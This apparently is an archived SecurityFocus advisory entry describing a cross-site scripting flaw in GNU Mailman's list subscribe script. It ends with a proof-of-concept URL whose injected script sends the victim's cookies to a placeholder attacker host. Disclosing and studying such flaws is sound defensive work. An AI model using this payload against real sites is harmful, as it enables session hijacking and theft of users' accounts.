7 lines
No EOL
507 B
Text
7 lines
No EOL
507 B
Text
source: https://www.securityfocus.com/bid/5298/info
|
|
|
|
GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.
|
|
|
|
An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.
|
|
|
|
http://target/mailman/subscribe/ml-name?info=<script>document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;</script> |